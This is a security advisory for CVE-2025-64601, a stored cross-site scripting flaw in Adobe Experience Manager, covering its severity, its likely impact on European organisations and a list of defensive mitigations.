CVE-2025-64601 is a stored Cross-Site Scripting (XSS) vulnerability identified in Adobe Experience Manager (AEM) versions 6.5.23 and earlier. The vulnerability arises from insufficient sanitization of user input in certain form fields, allowing a low-privileged attacker to inject malicious JavaScript code that is persistently stored on the server. When other users access the affected pages containing the injected scripts, the malicious code executes within their browsers under the context of the vulnerable site. This can lead to unauthorized actions such as session hijacking, credential theft, or manipulation of displayed content, impacting confidentiality and integrity. The vulnerability has a CVSS 3.1 base score of 5.4, indicating medium severity. The attack vector is network-based, with low attack complexity, requiring low privileges and user interaction (victim must visit the compromised page). The scope is changed, meaning the vulnerability affects components beyond the initially vulnerable module. No known exploits have been reported in the wild, and no official patches have been published at the time of disclosure. Adobe Experience Manager is widely used by enterprises and public sector organizations for managing digital content and customer experiences, making this vulnerability significant in environments where AEM is deployed. The vulnerability’s exploitation could facilitate further attacks such as phishing, privilege escalation, or data exfiltration if combined with other weaknesses.

For European organizations, the impact of CVE-2025-64601 can be significant, especially for those relying heavily on Adobe Experience Manager for web content management and digital experience platforms. Exploitation could lead to unauthorized access to sensitive information, including session tokens and user credentials, potentially enabling attackers to impersonate legitimate users or administrators. This compromises confidentiality and integrity of data and may facilitate further attacks such as lateral movement or deployment of malware. The vulnerability does not directly affect availability but can undermine trust in affected web services, causing reputational damage and potential regulatory scrutiny under GDPR if personal data is compromised. Organizations in sectors such as finance, government, healthcare, and e-commerce, which often use AEM for customer-facing portals, are particularly at risk. The requirement for user interaction (visiting a maliciously crafted page) means social engineering or phishing campaigns could be used to increase exploitation success. Given the widespread use of Adobe products in Europe, the threat could have broad implications if not addressed promptly.

1. Monitor Adobe’s official security advisories closely and apply patches or updates for Adobe Experience Manager as soon as they become available. 2. Implement strict input validation and output encoding on all form fields to prevent injection of malicious scripts, even before official patches are released. 3. Employ Content Security Policy (CSP) headers to restrict the execution of unauthorized scripts in browsers. 4. Limit user privileges to the minimum necessary, reducing the ability of low-privileged users to inject malicious content. 5. Conduct regular security audits and penetration testing focusing on web application vulnerabilities, including XSS. 6. Educate users and administrators about phishing and social engineering risks to reduce the likelihood of user interaction with malicious links. 7. Use web application firewalls (WAFs) configured to detect and block common XSS attack patterns targeting AEM. 8. Review and harden AEM configurations, disabling unnecessary features or components that could be exploited. 9. Implement robust logging and monitoring to detect suspicious activities related to form submissions and script injections. 10. Consider isolating critical AEM instances or sensitive content behind additional authentication layers or network segmentation.